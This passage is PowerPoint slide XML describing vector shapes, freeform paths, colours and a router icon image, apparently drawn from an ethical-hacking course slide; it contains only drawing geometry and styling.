                      <a:pt x="223" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="254" y="147"/>
                      <a:pt x="236" y="110"/>
                      <a:pt x="209" y="119"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="C0C0C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4" name="Freeform 1791">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E70B8AD-1237-48E2-AF7A-4854EE58CB7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40" y="1214"/>
                <a:ext cx="89" cy="56"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 66"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 10 w 66"/>
                  <a:gd name="T3" fmla="*/ 23 h 41"/>
                  <a:gd name="T4" fmla="*/ 16 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 54 w 66"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 57 w 66"/>
                  <a:gd name="T9" fmla="*/ 29 h 41"/>
                  <a:gd name="T10" fmla="*/ 30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30" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="37"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="10" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="21"/>
                      <a:pt x="13" y="16"/>
                      <a:pt x="16" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="10"/>
                      <a:pt x="54" y="0"/>
                      <a:pt x="54" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="21"/>
                      <a:pt x="47" y="25"/>
                      <a:pt x="57" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="46" y="41"/>
                      <a:pt x="30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5" name="Oval 1792">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A13BC0BC-4D93-4FD4-9ED3-978C941042C4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 flipH="1">
                <a:off x="2429" y="1132"/>
                <a:ext cx="119" cy="119"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFCC99"/>
              </a:solidFill>
              <a:ln w="6350" algn="ctr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pic>
          <p:nvPicPr>
            <p:cNvPr id="630" name="Picture 13" descr="Y:\CEH v7 - Haja\Icon Shock\CLEAN\Networking\wireless_router_256.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{023DE2B2-E580-4633-8766-B3E68490DB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81159" y="3216044"/>
              <a:ext cx="409261" cy="40926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631" name="Group 468">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{344B703B-DFAB-4226-8C8B-6BAAA30CAA5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103517" y="3390087"/>
              <a:ext cx="331837" cy="174807"/>
              <a:chOff x="5063" y="-2464"/>
              <a:chExt cx="1810" cy="954"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1065" name="Freeform 469">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FFED24A-81B4-48C8-8F73-91E44D5AD87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63" y="-2464"/>
                <a:ext cx="1810" cy="486"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1810"/>
                  <a:gd name="T1" fmla="*/ 120 h 486"/>
                  <a:gd name="T2" fmla="*/ 451 w 1810"/>
                  <a:gd name="T3" fmla="*/ 0 h 486"/>
                  <a:gd name="T4" fmla="*/ 1810 w 1810"/>
                  <a:gd name="T5" fmla="*/ 363 h 486"/>
                  <a:gd name="T6" fmla="*/ 1358 w 1810"/>
                  <a:gd name="T7" fmla="*/ 486 h 486"/>
                  <a:gd name="T8" fmla="*/ 0 w 1810"/>
                  <a:gd name="T9" fmla="*/ 120 h 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10" h="486">
                    <a:moveTo>
                      <a:pt x="0" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1810" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="486"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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6" name="Freeform 470">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67EEF1E4-A9A8-4F18-81AE-A40BDEE1106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63" y="-2344"/>
                <a:ext cx="1358" cy="834"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1358"/>
                  <a:gd name="T1" fmla="*/ 0 h 834"/>
                  <a:gd name="T2" fmla="*/ 0 w 1358"/>
                  <a:gd name="T3" fmla="*/ 470 h 834"/>
                  <a:gd name="T4" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T5" fmla="*/ 834 h 834"/>
                  <a:gd name="T6" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T7" fmla="*/ 366 h 834"/>
                  <a:gd name="T8" fmla="*/ 0 w 1358"/>
                  <a:gd name="T9" fmla="*/ 0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8" h="834">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="834"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="36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7" name="Freeform 471">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FA18781-6D18-4034-9215-7ED59596ECE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421" y="-2101"/>
                <a:ext cx="452" cy="591"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 452"/>
                  <a:gd name="T1" fmla="*/ 591 h 591"/>
                  <a:gd name="T2" fmla="*/ 0 w 452"/>
                  <a:gd name="T3" fmla="*/ 123 h 591"/>
                  <a:gd name="T4" fmla="*/ 452 w 452"/>
                  <a:gd name="T5" fmla="*/ 0 h 591"/>
                  <a:gd name="T6" fmla="*/ 452 w 452"/>
                  <a:gd name="T7" fmla="*/ 470 h 591"/>
                  <a:gd name="T8" fmla="*/ 0 w 452"/>
                  <a:gd name="T9" fmla="*/ 591 h 5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2" h="591">
                    <a:moveTo>
                      <a:pt x="0" y="591"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="59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8" name="Freeform 472">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC222289-8B4E-4FC4-9BB2-448BF37E496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17" y="-2249"/>
                <a:ext cx="322" cy="415"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 322"/>
                  <a:gd name="T1" fmla="*/ 0 h 415"/>
                  <a:gd name="T2" fmla="*/ 0 w 322"/>
                  <a:gd name="T3" fmla="*/ 330 h 415"/>
                  <a:gd name="T4" fmla="*/ 322 w 322"/>
                  <a:gd name="T5" fmla="*/ 415 h 415"/>
                  <a:gd name="T6" fmla="*/ 322 w 322"/>
                  <a:gd name="T7" fmla="*/ 85 h 415"/>
                  <a:gd name="T8" fmla="*/ 0 w 322"/>
                  <a:gd name="T9" fmla="*/ 0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2" h="415">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="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9" name="Freeform 473">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C233C887-8B50-46F3-88B2-8BF52950023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78" y="-2122"/>
                <a:ext cx="319" cy="416"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 319"/>
                  <a:gd name="T1" fmla="*/ 0 h 416"/>
                  <a:gd name="T2" fmla="*/ 0 w 319"/>
                  <a:gd name="T3" fmla="*/ 331 h 416"/>
                  <a:gd name="T4" fmla="*/ 319 w 319"/>
                  <a:gd name="T5" fmla="*/ 416 h 416"/>
                  <a:gd name="T6" fmla="*/ 319 w 319"/>
                  <a:gd name="T7" fmla="*/ 85 h 416"/>
                  <a:gd name="T8" fmla="*/ 0 w 319"/>
                  <a:gd name="T9" fmla="*/ 0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9" h="416">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="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0" name="Freeform 474">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD71750B-E8CE-41D0-A70F-504C4701D93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036" y="-1994"/>
                <a:ext cx="319" cy="415"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 319"/>
                  <a:gd name="T1" fmla="*/ 0 h 415"/>
                  <a:gd name="T2" fmla="*/ 0 w 319"/>
                  <a:gd name="T3" fmla="*/ 330 h 415"/>
                  <a:gd name="T4" fmla="*/ 319 w 319"/>
                  <a:gd name="T5" fmla="*/ 415 h 415"/>
                  <a:gd name="T6" fmla="*/ 319 w 319"/>
                  <a:gd name="T7" fmla="*/ 85 h 415"/>
                  <a:gd name="T8" fmla="*/ 0 w 319"/>
                  <a:gd name="T9" fmla="*/ 0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9" h="415">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="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632" name="Freeform 1310">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E0C2629-9DD6-454F-B1B3-BE71AC4AAB6A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="4436524" y="4036084"/>
              <a:ext cx="1522896" cy="410353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noFill/>
            <a:ln w="38100" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="2A79D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ACACA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25400" dir="54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33" name="Line 535">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8512A35-E063-4ECD-A60B-CDCFD31683A5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4753018" y="3954607"/>
              <a:ext cx="0" cy="234064"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="2A79D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634" name="Group 536">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A5EE87D-B124-425C-8334-7DF77415869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812274" y="3896831"/>
              <a:ext cx="220731" cy="188140"/>
              <a:chOff x="4876" y="-3681"/>
              <a:chExt cx="865" cy="735"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1057" name="Freeform 537">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AF2F99B-CFE1-4A77-9B5E-D1B069A310E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36" y="-3537"/>
                <a:ext cx="205" cy="506"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 87"/>
                  <a:gd name="T1" fmla="*/ 9 h 214"/>
                  <a:gd name="T2" fmla="*/ 14 w 87"/>
                  <a:gd name="T3" fmla="*/ 190 h 214"/>
                  <a:gd name="T4" fmla="*/ 69 w 87"/>
                  <a:gd name="T5" fmla="*/ 197 h 214"/>
                  <a:gd name="T6" fmla="*/ 75 w 87"/>
                  <a:gd name="T7" fmla="*/ 4 h 214"/>
                  <a:gd name="T8" fmla="*/ 43 w 87"/>
                  <a:gd name="T9" fmla="*/ 9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214">
                    <a:moveTo>
                      <a:pt x="43" y="9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="17"/>
                      <a:pt x="0" y="171"/>
                      <a:pt x="14" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="209"/>
                      <a:pt x="49" y="214"/>
                      <a:pt x="69" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="182"/>
                      <a:pt x="87" y="16"/>
                      <a:pt x="75" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="4"/>
                      <a:pt x="58" y="0"/>
                      <a:pt x="43" y="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8" name="Freeform 538">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{395DF0A8-418B-4994-A956-9F6F4A3751F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54" y="-3681"/>
                <a:ext cx="630" cy="654"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 267"/>
                  <a:gd name="T1" fmla="*/ 8 h 277"/>
                  <a:gd name="T2" fmla="*/ 14 w 267"/>
                  <a:gd name="T3" fmla="*/ 206 h 277"/>
                  <a:gd name="T4" fmla="*/ 247 w 267"/>
                  <a:gd name="T5" fmla="*/ 268 h 277"/>
                  <a:gd name="T6" fmla="*/ 247 w 267"/>
                  <a:gd name="T7" fmla="*/ 70 h 277"/>
                  <a:gd name="T8" fmla="*/ 14 w 267"/>
                  <a:gd name="T9" fmla="*/ 8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7" h="277">
                    <a:moveTo>
                      <a:pt x="14" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="16"/>
                      <a:pt x="1" y="187"/>
                      <a:pt x="14" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="225"/>
                      <a:pt x="234" y="277"/>
                      <a:pt x="247" y="268"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="259" y="260"/>
                      <a:pt x="267" y="108"/>
                      <a:pt x="247" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="240" y="56"/>
                      <a:pt x="28" y="0"/>
                      <a:pt x="14" y="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9" name="Freeform 539">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E894BCC-D8DC-4E1C-8D35-9A43053AAD5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17" y="-3620"/>
                <a:ext cx="489" cy="527"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 489"/>
                  <a:gd name="T1" fmla="*/ 0 h 527"/>
                  <a:gd name="T2" fmla="*/ 0 w 489"/>
                  <a:gd name="T3" fmla="*/ 397 h 527"/>
                  <a:gd name="T4" fmla="*/ 489 w 489"/>
                  <a:gd name="T5" fmla="*/ 527 h 527"/>
                  <a:gd name="T6" fmla="*/ 489 w 489"/>
                  <a:gd name="T7" fmla="*/ 130 h 527"/>
                  <a:gd name="T8" fmla="*/ 0 w 489"/>
                  <a:gd name="T9" fmla="*/ 0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9" h="527">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="527"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="13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69A2E1"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="69A2E1">
                      <a:gamma/>
                      <a:tint val="78824"/>
                      <a:invGamma/>
                    </a:srgbClr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0" name="Freeform 540">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04790D28-C3C1-444A-8EDD-F5CBB95D6AB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87" y="-3681"/>
                <a:ext cx="640" cy="172"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 100 w 271"/>
                  <a:gd name="T1" fmla="*/ 14 h 73"/>
                  <a:gd name="T2" fmla="*/ 41 w 271"/>
                  <a:gd name="T3" fmla="*/ 4 h 73"/>
                  <a:gd name="T4" fmla="*/ 0 w 271"/>
                  <a:gd name="T5" fmla="*/ 8 h 73"/>
                  <a:gd name="T6" fmla="*/ 233 w 271"/>
                  <a:gd name="T7" fmla="*/ 70 h 73"/>
                  <a:gd name="T8" fmla="*/ 265 w 271"/>
                  <a:gd name="T9" fmla="*/ 65 h 73"/>
                  <a:gd name="T10" fmla="*/ 100 w 271"/>
                  <a:gd name="T11" fmla="*/ 1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1" h="73">
                    <a:moveTo>
                      <a:pt x="100" y="14"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="9"/>
                      <a:pt x="48" y="4"/>
                      <a:pt x="41" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="4"/>
                      <a:pt x="7" y="2"/>
                      <a:pt x="0" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="222" y="60"/>
                      <a:pt x="233" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="237" y="73"/>
                      <a:pt x="271" y="69"/>
                      <a:pt x="265" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="257" y="59"/>
                      <a:pt x="161" y="29"/>
                      <a:pt x="100" y="1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1" name="Freeform 541">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{429D9868-A4B4-449B-8687-D99D129F471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76" y="-3154"/>
                <a:ext cx="660" cy="175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 660"/>
                  <a:gd name="T1" fmla="*/ 52 h 175"/>
                  <a:gd name="T2" fmla="*/ 208 w 660"/>
                  <a:gd name="T3" fmla="*/ 0 h 175"/>
                  <a:gd name="T4" fmla="*/ 660 w 660"/>
                  <a:gd name="T5" fmla="*/ 120 h 175"/>
                  <a:gd name="T6" fmla="*/ 452 w 660"/>
                  <a:gd name="T7" fmla="*/ 175 h 175"/>
                  <a:gd name="T8" fmla="*/ 0 w 660"/>
                  <a:gd name="T9" fmla="*/ 52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0" h="175">
                    <a:moveTo>
                      <a:pt x="0" y="52"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="208" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="660" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5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2" name="Freeform 542">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2B07BE1-0517-4E2B-BEF4-91722FD5E9F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28" y="-3034"/>
                <a:ext cx="198" cy="88"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 198"/>
                  <a:gd name="T1" fmla="*/ 55 h 88"/>
                  <a:gd name="T2" fmla="*/ 0 w 198"/>
                  <a:gd name="T3" fmla="*/ 88 h 88"/>
                  <a:gd name="T4" fmla="*/ 198 w 198"/>
                  <a:gd name="T5" fmla="*/ 36 h 88"/>
                  <a:gd name="T6" fmla="*/ 198 w 198"/>
                  <a:gd name="T7" fmla="*/ 0 h 88"/>
                  <a:gd name="T8" fmla="*/ 0 w 198"/>
                  <a:gd name="T9" fmla="*/ 5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88">
                    <a:moveTo>
                      <a:pt x="0" y="55"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5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3" name="Freeform 543">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD3D00BB-81B8-44D0-8904-A288F6EA76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76" y="-3102"/>
                <a:ext cx="452" cy="156"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 452 w 452"/>
                  <a:gd name="T1" fmla="*/ 156 h 156"/>
                  <a:gd name="T2" fmla="*/ 0 w 452"/>
                  <a:gd name="T3" fmla="*/ 35 h 156"/>
                  <a:gd name="T4" fmla="*/ 0 w 452"/>
                  <a:gd name="T5" fmla="*/ 0 h 156"/>
                  <a:gd name="T6" fmla="*/ 452 w 452"/>
                  <a:gd name="T7" fmla="*/ 123 h 156"/>
                  <a:gd name="T8" fmla="*/ 452 w 452"/>
                  <a:gd name="T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2" h="156">
                    <a:moveTo>
                      <a:pt x="452" y="156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452" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="15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4" name="Freeform 544">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3220B125-679D-4C5E-B893-0F2E263CF2B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938" y="-3140"/>
                <a:ext cx="517" cy="139"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 517"/>
                  <a:gd name="T1" fmla="*/ 38 h 139"/>
                  <a:gd name="T2" fmla="*/ 383 w 517"/>
                  <a:gd name="T3" fmla="*/ 139 h 139"/>
                  <a:gd name="T4" fmla="*/ 517 w 517"/>
                  <a:gd name="T5" fmla="*/ 104 h 139"/>
                  <a:gd name="T6" fmla="*/ 135 w 517"/>
                  <a:gd name="T7" fmla="*/ 0 h 139"/>
                  <a:gd name="T8" fmla="*/ 0 w 517"/>
                  <a:gd name="T9" fmla="*/ 3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7" h="139">
                    <a:moveTo>
                      <a:pt x="0" y="38"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="383" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3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635" name="Group 545">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86F3C1D6-B8A3-4CB2-9D69-47A9BC45088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650800" y="3916090"/>
              <a:ext cx="211842" cy="202955"/>
              <a:chOff x="535" y="1771"/>
              <a:chExt cx="401" cy="385"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1053" name="Freeform 546">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7A6BC29-7069-4445-B43D-59929BD6DEC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67" y="1808"/>
                <a:ext cx="269" cy="348"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 454"/>
                  <a:gd name="T1" fmla="*/ 120 h 588"/>
                  <a:gd name="T2" fmla="*/ 0 w 454"/>
                  <a:gd name="T3" fmla="*/ 588 h 588"/>
                  <a:gd name="T4" fmla="*/ 454 w 454"/>
                  <a:gd name="T5" fmla="*/ 468 h 588"/>
                  <a:gd name="T6" fmla="*/ 454 w 454"/>
                  <a:gd name="T7" fmla="*/ 0 h 588"/>
                  <a:gd name="T8" fmla="*/ 0 w 454"/>
                  <a:gd name="T9" fmla="*/ 120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4" h="588">
                    <a:moveTo>
                      <a:pt x="0" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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4" name="Freeform 547">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D363C411-985F-44E3-A9C6-608337A6DE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5" y="1843"/>
                <a:ext cx="132" cy="313"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 224"/>
                  <a:gd name="T1" fmla="*/ 0 h 529"/>
                  <a:gd name="T2" fmla="*/ 0 w 224"/>
                  <a:gd name="T3" fmla="*/ 470 h 529"/>
                  <a:gd name="T4" fmla="*/ 224 w 224"/>
                  <a:gd name="T5" fmla="*/ 529 h 529"/>
                  <a:gd name="T6" fmla="*/ 224 w 224"/>
                  <a:gd name="T7" fmla="*/ 61 h 529"/>
                  <a:gd name="T8" fmla="*/ 0 w 224"/>
                  <a:gd name="T9" fmla="*/ 0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4" h="529">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="529"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="61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5" name="Freeform 548">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{416B288E-5035-42F8-8133-16DD76F077D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5" y="1771"/>
                <a:ext cx="401" cy="108"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 678"/>
                  <a:gd name="T1" fmla="*/ 121 h 182"/>
                  <a:gd name="T2" fmla="*/ 451 w 678"/>
                  <a:gd name="T3" fmla="*/ 0 h 182"/>
                  <a:gd name="T4" fmla="*/ 678 w 678"/>
                  <a:gd name="T5" fmla="*/ 62 h 182"/>
                  <a:gd name="T6" fmla="*/ 224 w 678"/>
                  <a:gd name="T7" fmla="*/ 182 h 182"/>
                  <a:gd name="T8" fmla="*/ 0 w 678"/>
                  <a:gd name="T9" fmla="*/ 121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8" h="182">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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6" name="Freeform 549">
